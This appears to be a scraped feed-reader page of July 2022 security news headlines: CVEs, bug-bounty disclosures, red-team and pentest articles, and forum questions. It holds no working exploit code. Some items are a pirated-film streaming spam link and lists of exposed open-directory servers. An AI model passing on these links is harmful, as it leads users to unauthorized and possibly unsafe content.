  • Open

    X — A Sexy Horror Story (2022) Film SUB ITA — CB01 Altadefinizione
    guarda X — A Sexy Horror Story (2022) film completo, X — A Sexy Horror Story streaming ita, X — A Sexy Horror Story streaming… Continue reading on Medium »
  • Open

    Cracking Kubernetes Authentication (AuthN) Model
    Part of this post’s contents first appeared in User and workload identities in Kubernetes, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and very friendly to beginners. The version posted here in contrast has a biased focus on the design and implementation, as well as in-depth discussions. Related posts: Cracking Kubernetes Node Proxy (aka kube-proxy) Cracking Kubernetes Network Policy Cracking Kubernetes Authentication (AuthN) Model Cracking Kubernetes RBAC Authorization (AuthZ) Model TL; DR This post digs into the Kubernetes authentication (AuthN) model. Specifically, we’ll start from analyzing the technical requirements of AuthN in Kubernetes then design one for it (assuming it hasn’t had one yet), the final solution has an end-to-end workflow like below: Hop…

  • Open

    Vulnerability to unlock and remotely start virtually all models of Honda cars
    Article URL: https://twitter.com/wugeej/status/1547043442488147969 Comments URL: https://news.ycombinator.com/item?id=32090211 Points: 2 # Comments: 0
    A macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706
    Article URL: https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Comments URL: https://news.ycombinator.com/item?id=32088196 Points: 8 # Comments: 0
    OpenSSL Heap Memory Corruption Vulnerability Fixed
    Article URL: https://thenewstack.io/openssl-heap-memory-corruption-vulnerability-fixed/ Comments URL: https://news.ycombinator.com/item?id=32087941 Points: 1 # Comments: 0
  • Open

    Introducing Decompiler Explorer (🐶⚡️)
    submitted by /u/Psifertex [link] [comments]
    CVE-2022-29885 - Apache Tomcat Cluster Service DoS
    submitted by /u/voidz0r [link] [comments]
    Dealing with Failure: Failure Escalation Policy in CLR Hosts
    submitted by /u/jeandrew [link] [comments]
    Attacking Active Directory: 0 to 0.9
    submitted by /u/CyberMasterV [link] [comments]
    How Windows Processes Work - Creation, APIs, Data Structures (Part 1)
    submitted by /u/sciencestudent99 [link] [comments]
    This Salesforce Tableau Server XSS vulnerability will not get a CVE attributed. Here is the PoC and the fixed versions.
    submitted by /u/obilodeau [link] [comments]
    From Prototype Pollution to Remote Code Execution in Blitz.js
    submitted by /u/SonarPaul [link] [comments]
    Affinis - Subdomain Discovery Through RNN (Recurrent Neural Network)
    submitted by /u/jibblz [link] [comments]
    The Long Tail of Log4Shell Exploitation
    submitted by /u/scopedsecurity [link] [comments]
    Introducing Pretender: Your New Sidekick for Relaying Attacks
    submitted by /u/RedTeamPentesting [link] [comments]
    CVE-2022-32223 Discovery: DLL Hijacking via npm CLI
    submitted by /u/mkatch [link] [comments]
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP ($6,000 Bug Bounty)
    submitted by /u/numanturle [link] [comments]
    Rolling PWN Attack Affecting Honda Vehicles
    submitted by /u/0xdea [link] [comments]
    Executing Arbitrary Code Over a Phone Line Thanks to the XBAND Video Game Modem
    submitted by /u/vincelasal [link] [comments]
  • Open

    【安全通报】2022年7月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年7月 安全补丁,修复了针对 36 款微软产品的 84 个漏洞,其中52个权限提升漏洞,4个安全功能绕过漏洞,12个远程代码执行漏洞,11个信息泄露...
  • Open

    【安全通报】2022年7月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年7月 安全补丁,修复了针对 36 款微软产品的 84 个漏洞,其中52个权限提升漏洞,4个安全功能绕过漏洞,12个远程代码执行漏洞,11个信息泄露...
  • Open

    Four more Movies/Series ODs (Lots of stuff)
    http://www.moviefyy.com/Film/ ​ http://192.95.30.30/lol/ ​ http://103.222.20.150/ftpdata/ ​ http://167.114.174.132:9092/ submitted by /u/LordPato [link] [comments]
    Two Huge Movie/Series Open Directories
    http://ir2.papionvod.ir/Media/ https://dl3.3rver.org/ submitted by /u/LordPato [link] [comments]
    Photos of Idaho things: Idaho state fair, Idaho potatoes, Idaho Mormons, Idaho vacuum cleaner museum....
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    A macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706
    Article URL: https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Comments URL: https://news.ycombinator.com/item?id=32088196 Points: 8 # Comments: 0
    CVE-2022-32224: Possible RCE escalation bug in SerializedColumns in ActiveRecord
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-32224-possible-rce-escalation-bug-with-serialized-columns-in-active-record/81017 Comments URL: https://news.ycombinator.com/item?id=32082974 Points: 1 # Comments: 0
  • Open

    Cyber Security Kill Chain : Explained
    A hacker only needs one attack vector to succeed. Your responsibility is to identify these potential attack vectors as “your security is… Continue reading on Medium »
  • Open

    OTP Bypass via Response Manipulation
    Hello Readers, I am Tariq Rafiq Kehar , a bug hunter. Continue reading on Medium »
    Useful Offensive Snippets
    I will update this post regularly, I am starting with a few of my most commonly used snippets. Continue reading on Medium »
    How to study Cyber Security on your own for free?
    This was always the question in my mind from the very beginning and after studying for months and doing deep analysis and research, I came… Continue reading on Medium »
    How to find Origin IP
    வணக்கம் மக்களே!!! I’m Boopathi. In this blog, I’m gonna discuss about Origin IP Continue reading on Medium »
    COLIZEUM Bug-Bounty Program
    Report a bug and get Whitelisted for Colizeum ELITE NFT sale, this is an opportunity to get hands-on ELITE NFT before anybody else does. Continue reading on Medium »
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP
    During my early stages of employment at Gais Cyber Security in 2021, my manager had reached out to me over the phone and said with… Continue reading on Medium »
  • Open

    War in Ukraine / July 12
    Day 140: The question of the day: will it be possible to agree on the export of Ukrainian grain by sea Continue reading on Medium »
  • Open

    SecWiki News 2022-07-13 Review
    云沙箱流量识别技术剖析 by ourren 基于开源工具实现软件成分分析SCA by ourren Kscan: 一款纯go开发的全方位扫描器 by ourren 疑似PurpleFox多手段持续实施攻击活动 by ourren 了解C4ISR,漂亮国在信息化作战还是要借鉴 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-13 Review
    云沙箱流量识别技术剖析 by ourren 基于开源工具实现软件成分分析SCA by ourren Kscan: 一款纯go开发的全方位扫描器 by ourren 疑似PurpleFox多手段持续实施攻击活动 by ourren 了解C4ISR,漂亮国在信息化作战还是要借鉴 by ourren 更多最新文章,请访问SecWiki
  • Open

    Stored XSS for Grafana dashboard URL
    GitLab disclosed a bug submitted by xanbanx: https://hackerone.com/reports/684268 - Bounty: $2500
    Undici does not use CONNECT or otherwise validate upstream HTTPS certificates when using a proxy
    Node.js disclosed a bug submitted by pimterry: https://hackerone.com/reports/1583680
    Undici ProxyAgent vulnerable to MITM
    Internet Bug Bounty disclosed a bug submitted by pimterry: https://hackerone.com/reports/1599063 - Bounty: $1000
    One Click XSS in [www.shopify.com]
    Shopify disclosed a bug submitted by comwrg: https://hackerone.com/reports/1563334 - Bounty: $500
    rubygems.org Batching attack to `confirmation_token` by bypass rate limit
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1559262 - Bounty: $480
    CVE-2021-40438 on cp-eu2.acronis.com
    Acronis disclosed a bug submitted by savik: https://hackerone.com/reports/1370731 - Bounty: $150
    [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
    Acronis disclosed a bug submitted by rhinestonecowboy: https://hackerone.com/reports/1425474 - Bounty: $1000
  • Open

    Affinis - Subdomain Discovery Through RNN (Recurrent Neural Network)
    submitted by /u/jibblz [link] [comments]
    Bypass Windows Defender by utilizing malicious SMB requests inside MS Word Macro
    Hope you enjoyed, learned something new and I would love to receive a feedback. https://youtu.be/A8DkVDQW1-w submitted by /u/lsecqt [link] [comments]
    Free4All Information Technology and Cyber Security Resources
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption
    We show how metadata encryption and decryption contributes to making Cobalt Strike an effective emulator that is difficult to defend against. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption appeared first on Unit 42.
  • Open

    Why isn't there an AppArmor alternative for Windows?
    I know Windows has Mandatory Integrity Control, but it doesn't have Mandatory Access Control like Linux does with AppArmor or SELinux. It seems like AppArmor would be useful, at least for power users so my question is: Why isn't there an AppArmor (MAC) alternative for Windows? submitted by /u/greyyit [link] [comments]
    Is it me, the company or my job?
    Hello. For a longer time I work as an ethical hacker/redteamer. Few months ago I started feeling that I do not learn anything new, I am stuck and there is no way to go for me to improve. When I come home, I have no energy to do some CTFs or start my own project. I just want to lay in my bed and listen to a podcast or video of completely different topic. In this company, we do pentests of huge corporates and many time many things go wrong - the timing, the preparedness from the side of the client, the scope. All these things touch me on very deep level, I want to deliver very professional work and do the best I can. But all of these things suck my energy. I have said many times that things need to change because otherwise we will burn out quickly, all of us. We need new stuff, something to get us inquisitive, some new challenges - not yet another scope of 1 web banking application with limited subscope of 20 API calls and 1 host. But nothing changed, the people above do not listen. All they care about is the profit. We however do sometimes get our hands on some nice projects but usually these are like a firefly in the night, very very rare. I feel like I reached my capacity of ethical hacking and would like to improve in security research and exploit development but I do not have any mentor to follow me through. And I like the money I get now because I do my job very good and can do any task I am given. Companies I have found in the market want someone already skilled enough to just throw zerodays out of the sleeve. I want to move but have no energy to do it. Is there a problem in me? Should I change my attitude (which is already against my belief) to just do the job and then go home empty and watch other things - "it is just my job, I can do anything else in my free time"? Or is it the company that is wrong? Or is it the whole ethical hacking or infosec in general? Is there any reasonable advice how to actually solve this...? Thank you for reading... submitted by /u/elvisdnb [link] [comments]
    Compromised Device - Incident Process post device containment
    Hi Guys, ​ Ive got an incident where a device has been compromised. We've managed to isolate the device, take it offline and rebuild it. Using our SIEM tool, what should I be looking at to look for signs of persistence, lateral movement or C2 communications. I can lookup the user, get everything our SIEM logs for them but then with all this information i can never make heads or tails of it... Alot of the stuff is probably normal traffic such as VPN connections, Connecting to Microsoft etc. What can i do to filter out all of this noise and find the other stuff or is that what its like for everyone? ​ Should i be looking at IoC's for that specific malware? Should i be looking at the devices activity? Do you (yes you reader) spend hours looking for persistence or do just rebuild and move on to the next ticket? ​ ​ We use LogRhythm for reference so any specific tips would be great :) ​ Please feel free to recommend books, paper, courses or videos to educate myself and of course tips on here are super helpful. *Cant really ask someone within the team as we're a very immature team with mature tooling/services so no one really knows how to do this* submitted by /u/Maidenless4ever [link] [comments]
    Is it worth paying an extra $29/yr for Keepers BreachWatch?
    Keeper says that BreachWatch monitors the dark Web for breached accounts, but is it actually effective? If it only monitors limited databases it's not particularly useful. submitted by /u/ForComputerStuff [link] [comments]
  • Open

    ‍IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview
  • Open

    ‍IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview
  • Open

    ‍IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview
  • Open

    FreeBuf早报 | 拜登的iCloud账户疑似被黑;WPS再次回应删除用户本地文件事件
    匿名社交媒体网站4chan上的发帖者声称,他们已经进入了亨特-拜登的iCloud账户,并发布了据说是从其中提取的照片和视频。
    【漏洞分析】Drupal 远程代码执行(CVE-2017-6920)
    前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞为 CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多...
    小菜鸡的攻防演练之旅
    最近参加了一次小型攻防演练也是我第一次参加这种活动,所以简单记录下过程。
    黑客盯上了欧洲央行行长
    欧洲中央银行行长克里斯蒂娜·拉加德遭到了一次未遂的网络攻击。
    遭受大规模DDOS 攻击,立陶宛能源公司业务被迫中断
    近期,立陶宛能源公司Ignitis Group遭受了十年来最大的网络攻击。
    微软:超1万家企业遭受钓鱼攻击
    微软表示,从2021年9月开始,已经有超过一万个组织受到网络钓鱼攻击。
    洞鉴零信任,CIS网络安全创新大会夏日版零信任安全论坛回顾
    零信任安全论坛的专家们通过干货满满的议题内容,全方位勾勒出了现今零信任的运用方案体系以及未来的发展脉络。
  • Open

    Pocsuite3 入门教程
    作者:知道创宇404实验室 时间:2022年7月13日 1 简介 Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架,自 2015 年开源以来,知道创宇安全研究团队持续维护至今,不断更新迭代。 一些特性: 支持 verify、attack、shell 三种模式,不仅为扫描而生,也可用于其他场景,比如漏洞 exploit、获取目标的交互式...
    探寻 Java 文件上传流量层面 waf 绕过
    作者:Y4tacker 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 无意中看到ch1ng师傅的文章觉得很有趣,不得不感叹师傅太厉害了,但我一看那长篇的函数总觉得会有更骚的东西,所幸还真的有,借此机会就发出来一探究竟,同时也不得不感慨下RFC文档的妙处,当然本文针对的技术也仅仅只是在流量层面上waf的绕过...
  • Open

    Pocsuite3 入门教程
    作者:知道创宇404实验室 时间:2022年7月13日 1 简介 Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架,自 2015 年开源以来,知道创宇安全研究团队持续维护至今,不断更新迭代。 一些特性: 支持 verify、attack、shell 三种模式,不仅为扫描而生,也可用于其他场景,比如漏洞 exploit、获取目标的交互式...
    探寻 Java 文件上传流量层面 waf 绕过
    作者:Y4tacker 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 无意中看到ch1ng师傅的文章觉得很有趣,不得不感叹师傅太厉害了,但我一看那长篇的函数总觉得会有更骚的东西,所幸还真的有,借此机会就发出来一探究竟,同时也不得不感慨下RFC文档的妙处,当然本文针对的技术也仅仅只是在流量层面上waf的绕过...
  • Open

    Career question about private sector
    Hi Interested in computer forensics but it seems to be dominated by le. Nothing against le but would like to enter a career where I wouldn't necessarily HAVE to go through le. So can anyone advise on what some of the private sector roles and career paths in the computer forensics field. I wouldn't mind being some sort of digital private investigator but would like to know how realistic that would be. TIA! submitted by /u/zrobb999 [link] [comments]
    What data can I pull from Echo Dot & how long before it’s overwritten by new data?
    Context: my best friend died recently and I just realized that there are a few echo dots at his house. When I told his family that it may be possible to pull audio from the echo dots, so as to provide some insight into what was happening before he died, they were very interested. I am fairly tech savvy but only have dabbled in computer forensics at a hobbyist/total novice level. That being said, is it feasible for me to attempt to grab data from my late friend’s echo dots? What’s the process? What should I be wary of, what kinds of credentials do I need etc? Thanks so much in advance. Hope my question made sense; I’m still pretty foggy mentally as I process my friend’s untimely death :( submitted by /u/feelin_weird [link] [comments]
    Volatility Help - pagefile & hiberfil
    Hi all. I've been poking around trying to analyze a pagefile and hiberfil I recovered, but for the life of me, I can't get volatility to play nice with me. So for starters, I've confirmed via the registry that the processor is AMD64 architecture and that it's Windows 10 19041.1.vb_release.191206-1406. I've tried using volatility to convert to a raw image (vol -f file.sys imagecopy -O target.raw) and no matter what profile I apply - which, ostensibly should be Win10x64_19041 - no plugins will take against it. Not in Volatility 2.6, 3.1, or 3.2. In the latter two, imagecopy is not an available plugin. I am not sure what I am doing wrong, if I am missing plugins, or what have you, but I would appreciate any guidance. I would buy Arsenal Recon's tools, but that isn't currently an option. submitted by /u/KillithidMindslayer [link] [comments]

  • Open

    Can you get malware just from entering a website?
    Not really sure as if this subreddit is the right place to ask, so if it’s not, please excuse me. So long story short, I googled “youtube” and clicked a little too fast on the top result which seemed like the official youtube link. For those asking, the link I clicked had the “ad” mentioned above it, so it was the top result and the actual official youtube link came right under. After clicking on the top link, a weird website opened that was definitely not YouTube. It clearly looked like something to scare people (e.g., your OS is infected or call this number for help in bold red letters). I’d like to know how likely it is that some malware are now on my computer resulting of this? Is it possible to get any virus only from entering a website? I didn’t click on anything after entering this website, I only took a screenshot (if people want to see) and closed everything. Thank you! submitted by /u/TangerineNo6098 [link] [comments]
    How well does CRTP teach you about pivoting and windows privilege escalation?
    in perparation for the OSCP i though about taking the CRTP, i read that it teached you pivoting and windows escalation, but how well though? like OSCP level well ? will i need other training other than it ? submitted by /u/watermelonSoundsNice [link] [comments]
    Need some advice on certifications paths to take
    I got like 700-800 $ to spend and don't know which path i should take for the best looking resume failed my OSCP exam and retake costs 250$ i'm very bad in AD and windows priv escalation so thought about taking CRTP (cert costs 250$ and videos and lab alone cost 70$) having taken the OSCP exam before, i can say the exam is horrible i and i may fail again even with CRTP so thinking about potentially taking PNPT (300$) or eCPPT (400$) i have a few routes to take , could take the CRTP cert to have a good looking cert on the resume (don't know exactly how good recruiters will look at it) or could just take the training alone for 70$ and save for another potential OSCP retake or maybe PNPT/eCPPT if things don't workout with the OSCP Kinda lost with this, will i miss out if i take the CRTP training alone without the cert ? help submitted by /u/watermelonSoundsNice [link] [comments]
    Assessing cyber resilience
    Hi all! I’ve got a question about assessing the cyber resilience of a organization. is there a standard to assess the cyber resilience? are there frameworks described? are there good books or articles about cyber resilience? Thanks in advance! submitted by /u/overigegebruiker12 [link] [comments]
  • Open

    Retbleed: Arbitrary Speculative Code Execution with Return Instructions
    submitted by /u/mstromich [link] [comments]
    How to secure Kubernetes deployment with signature verification – Cosign and Connaisseur
    submitted by /u/MiguelHzBz [link] [comments]
    Microsoft Azure Site Recovery DLL Hijacking ($10,000 Bug Bounty)
    submitted by /u/dinobyt3s [link] [comments]
    From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
    submitted by /u/SCI_Rusher [link] [comments]
    Exploratory analysis of CVEs - Some interesting viz
    submitted by /u/10xpdev [link] [comments]
    Exploiting Authentication in AWS IAM Authenticator for Kubernetes
    submitted by /u/albinowax [link] [comments]
  • Open

    Rails Security Release CVE-2022-32224
    Article URL: https://rubyonrails.org/2022/7/12/Rails-Versions-7-0-3-1-6-1-6-1-6-0-5-1-and-5-2-8-1-have-been-released Comments URL: https://news.ycombinator.com/item?id=32075137 Points: 3 # Comments: 0
  • Open

    web漏洞挖掘利用
    注:此文章只供参考学习,各国法律明令禁止黑客非法攻击,后果自负!
    FreeBuf早报 | 美国最新公布“量子防御算法”;EDF 接受网络安全记录审查
    目前,美国国家标准与技术研究所(NIST)正式认可能抵御量子计算机攻击的四种加密算法技术,可预防未来网络攻击。
    攻击者提供虚假Offer,从 Axie Infinity 窃取5.4亿美元
    攻击者通过 LinkedIn 向 Axie Infinity 一名高级工程师提供了一份虚假Offer,盗取了该公司 5.4 亿美元。
    GitHub Actions和Azure虚拟机正在被用于云挖矿
    据The Hack News消息,GitHub Actions和Azure虚拟机 (VM) 正在被用于基于云的加密货币挖掘。这意味着,挖矿黑灰产已经开始将目光转向云资源。
    警惕Google更新,可能是勒索软件伪装
    一种新的勒索软件正以谷歌更新的形式出现在网络上,利用Windows系统的功能进行勒索攻击。
    未来五年,网络在线支付诈骗造成的损失将高达3430亿美元
    未来五年,全球在线支付诈骗造成的总损失将超过3430亿美元。
    以攻防促安全 |「CIS网络安全创新大会·夏日版」攻防论坛回顾
    作为CIS网络安全创新大会夏日版三大论坛之一,实网对抗与攻防演练专场邀请多位专家、大咖共聚一堂,从攻防视角出发,探讨企业安全新发展。
  • Open

    War in Ukraine / July 11
    Day 139: Ukraine’s economic problems Continue reading on Medium »
    No Future for the North Korea Fixer
    An indictment by US authorities against two crypto diplomats, now added to the US Most-Wanted list, sparked an #OSINT investigation Continue reading on Medium »
    Google Hacking
    Apa itu Google Dork? Continue reading on Medium »
  • Open

    From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
    submitted by /u/SCI_Rusher [link] [comments]
    Interview with a 16-year-old Lapsus$ Hacker
    submitted by /u/cybersocdm [link] [comments]
  • Open

    SecWiki News 2022-07-12 Review
    afrog 发布新版本 Release 1.3.5 真的想你 by 胖胖的ALEX 入侵模拟攻击演练平台建设 by ourren 开源安全:挑战、解决方案和机遇 by ourren 从CICD漏洞靶场中学习持续集成安全 by ourren Bad Packet 测量在野 IoT 僵尸网络活动 by Avenger SecWiki周刊(第436期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-12 Review
    afrog 发布新版本 Release 1.3.5 真的想你 by 胖胖的ALEX 入侵模拟攻击演练平台建设 by ourren 开源安全:挑战、解决方案和机遇 by ourren 从CICD漏洞靶场中学习持续集成安全 by ourren Bad Packet 测量在野 IoT 僵尸网络活动 by Avenger SecWiki周刊(第436期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Write Up 1: Hellosign Integration [Full Read SSRF]
    بسم الله الرحمن الرحيم Continue reading on Medium »
    Multiple $50,000 Reward Tickets in Aleph Zero’s and Immunefi’s Bug Bounty Program
    Aleph Zero has decided to partner with Immunefi to deliver a bug bounty program dedicated to seeking out vulnerabilities that may hinder… Continue reading on Aleph Zero Foundation »
    Business Logic Vulnerability — REGISTRATION Using Fake Email Account & Valid Company Name
    Description: Continue reading on Medium »
    Recox v2.0 -classifying vulnerabilities in web applications
    The script’s goal is to aid in the classification of vulnerabilities in web applications. RecoX, the emerging methodology, can detect… Continue reading on Medium »
    CSRF Vulnerability
    Hello, welcome to my new article, this article will talk about how I found CSRF on the login page. First, let me introduce myself, my name… Continue reading on Medium »
    Qué es Bug Bounty y por qué es ahora utilizado también por el cibercrimen
    por Víctor Ruiz, fundador de SILIKN e instructor certificado en ciberseguridad — CSCT™. Continue reading on Medium »
  • Open

    ChromeLoader: New Stubborn Malware Campaign
    A malicious browser extension is the payload of the ChromeLoader malware family, serving as adware and an infostealer, leaking users’ search queries. The post ChromeLoader: New Stubborn Malware Campaign appeared first on Unit 42.
  • Open

    Attacking Active Directory: TryHackMe
    Today, we are up with yet a new walkthrough, but the domain is something interesting. We would be looking at a room on TryHackMe called… Continue reading on Medium »
    What is Red-Team Testing | Red Team Assessment- Komodo Cyber Security
    WHY DO YOU NEED A RED-TEAM? Continue reading on Medium »
  • Open

    Huge list of cell phone ringtones
    http://onj3.andrelouis.com/phonetones/unzipped/ submitted by /u/Buzz1ight [link] [comments]
    Another huge list of ODs! :D (31 ODs)
    https://openweb.uz/apps/ - Software http://iranfl.persiangig.com - Misc http://www.4oneworld.org/files/ - Images http://www.andrelouis.com/media/ - Music & some other stuff https://gstreamer.freedesktop.org/media/ - Video & Music (and some other stuff) http://www.geo.mtu.edu/volcanoes/boris/ - Misc http://www.narrowbandimaging.com/incoming/ - Misc https://son.rochester.edu/assets/images/ - Images http://lamborns.com/pictures/ - Images https://ww2.cs.fsu.edu/~curci/ - PDFs and Images https://ftp.tourmentine.com - Images, MP3s, Videos, and some other stuff https://natewren.com/themes/ - Images https://websitearchive2020.nepa.gov.jm/new/ - Misc https://ferry-county.com/Images/ - Images http://shortpumppourhouse.com/images/ - Images http://www.pezlist.com/mcpez/images/ - Images http://www.sckans.edu/ext/ - Misc https://otlibrary.com/wp-content/gallery/ - Images http://www.nwhiker.com/wallpaper/ - Images https://jorge.fbarr.net/files/ - Misc https://ftp.mpi-inf.mpg.de/pub/ - Misc http://www.4oneworld.org/files/ - Dead https://www.cs.cmu.edu/~quake-papers/ - Misc http://ftp.esrf.eu | ftp://ftp.esrf.eu - Misc https://hippych.com/files/ - Misc http://46.219.24.140 - Misc http://www.lookas.net/ftp/ - Software & some other stuff https://www2.census.gov https://ftp.sangoma.com - Software https://downloads.thebobsgamingnetwork.net - Minecraft server? https://www.stchur.com/personal/ - Random http://tomflahertymusic.com/mp3s/ - MP3s *New! http://penguinradio.dominican.edu - Audio & MP3s ​ Pastebin: https://pastebin.com/Np7iufPw submitted by /u/ilikemacsalot [link] [comments]
    short history documentaries, survival guides and other miscellaneous stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Dungeons and Dragons stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Rolling-PWN vulnerability affects all Honda vehicles
    Article URL: https://rollingpwn.github.io/rolling-pwn/ Comments URL: https://news.ycombinator.com/item?id=32066201 Points: 141 # Comments: 93
  • Open

    Github base action takeover which is used in `github.com/Shopify/unity-buy-sdk`
    Shopify disclosed a bug submitted by codermak: https://hackerone.com/reports/1439355 - Bounty: $800
  • Open

    nRF52 平台芯片电压毛刺注入绕过调试保护
    作者:轨道教主 原文链接:https://www.bilibili.com/read/cv17283492 漏洞原理 在nRF52芯片中为防止出现nRF51中所出现的漏洞,芯片厂加入了APPROTECT功能来防止调试接口在保护状态下被使用,此功能通过直接断开调试接口与cpu的通讯来进行实现 APPROTECT的启用为用户信息配置寄存器 (UICR)中的地址0x10001208写入0xFFF...
  • Open

    nRF52 平台芯片电压毛刺注入绕过调试保护
    作者:轨道教主 原文链接:https://www.bilibili.com/read/cv17283492 漏洞原理 在nRF52芯片中为防止出现nRF51中所出现的漏洞,芯片厂加入了APPROTECT功能来防止调试接口在保护状态下被使用,此功能通过直接断开调试接口与cpu的通讯来进行实现 APPROTECT的启用为用户信息配置寄存器 (UICR)中的地址0x10001208写入0xFFF...

  • Open

    Güvenli Olmayan Web Kameralarını bulma
    OSINT Continue reading on Medium »
    War in Ukraine / July 8–10
    👉 Overview of the activities of the Verkhovna Rada: One MP Less, Five Unapproved Initiatives and «DNA Database» Continue reading on Medium »
    Як провести OSINT-аналіз токсичної IP-адреси? (кейс)
    Як виявити токсичну IP-адресу, проаналізувати її та довести причетність до атаки. OSINT-аналіз IP. Мережева розвідка. Розслідування атак. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    [h1-2102] HTML injection in packing slips can lead to physical theft
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1087122 - Bounty: $900
    [h1-2102] Stored XSS in product description via `productUpdate` GraphQL query leads to XSS at handshake-web-internal.shopifycloud.com/products/[ID]
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1085546 - Bounty: $1600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserTfaEnforcement
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1085042 - Bounty: $950
    Improper deep link validation
    Shopify disclosed a bug submitted by fr4via: https://hackerone.com/reports/1087744 - Bounty: $600
    Collaborators and Staff members without all necessary permissions are able to create, edit and install custom apps
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1555502 - Bounty: $1900
    Theme editor `oseid` parameter is leaked to third-party services through the `Referer` header which leads to somekind of storefront password bypass.
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1262434 - Bounty: $500
    Able to view hackerone reports attachments
    GitLab disclosed a bug submitted by sateeshn: https://hackerone.com/reports/979787 - Bounty: $12000
    Mass Account Takeover at https://app.taxjar.com/ - No user Interaction
    Stripe disclosed a bug submitted by beerboy_ankit: https://hackerone.com/reports/1581240 - Bounty: $11500
    Getting a free delivery by singing up from "admin_@glovoapp.com"
    Glovo disclosed a bug submitted by cmuppin: https://hackerone.com/reports/1296584
    Server Side Template Injection on Name parameter during Sign Up process
    Glovo disclosed a bug submitted by battle_angel: https://hackerone.com/reports/1104349
  • Open

    leveraging the SQL injection to execute the XSS by evading CSP.
    Although it sounds silly, I am dumb enough to do this. Continue reading on Medium »
  • Open

    Paraswap Deposits 1M PSP to Their Bug Bounty via Hats Finance
    Another project extends their long term commitment to security! Shoutout to Paraswap for depositing 1M PSP tokens to their bug bounty in… Continue reading on Medium »
    Hacking on a Private Program (Salseforce crm)
    I was hunting on a private program of HackerOne so lets call it developer.target.com i found a register option so i registered there after… Continue reading on System Weakness »
    MSA Weekly 3 — “How to Approach Your Target Machine — Nmap Technique”
    Hai Hai, Salam hangat teman teman. Semoga kita senantiasa dalam perlindungan tuhan yang maha esa. Continue reading on Medium »
    Hackers Exploiting Follina Bug to Deploy Rozena Backdoor
    A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously… Continue reading on Medium »
  • Open

    MimiKatz for Pentester: Kerberos
    This write-up will be part of a series of articles on the tool called Mimikatz which was created in the programming language C. it is The post MimiKatz for Pentester: Kerberos appeared first on Hacking Articles.
  • Open

    MimiKatz for Pentester: Kerberos
    This write-up will be part of a series of articles on the tool called Mimikatz which was created in the programming language C. it is The post MimiKatz for Pentester: Kerberos appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-07-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Cyber Certifications Are A Scam!
    Summary: Vendor Certifications serve the vendor more than they do the student. Skill-based certifications with written exams can’t… Continue reading on Medium »
  • Open

    hijagger: Checks all maintainers of all NPM and Pypi packages for hijackable packages through domain re-registration
    submitted by /u/FireFart [link] [comments]
    WAF from the scratch
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    photos of missile launch systems
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Lots of MMO screenshots from the early 2000s
    Marked as nsfw for occasional naughty humor + the fact that I haven't looked through everything http://www.sheffy.org/ao/ss/ submitted by /u/chloroformica [link] [comments]
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    FreeBuf早报 | PyPI要求关键项目维护者使用2FA;金山回应将网文作者文稿锁定
    一位网文作者在龙的天空论坛发帖,称其写的网文文稿被金山办公软件 WPS 锁定。金山软件 WPS 官方微博7月11日下午发表声明回应。
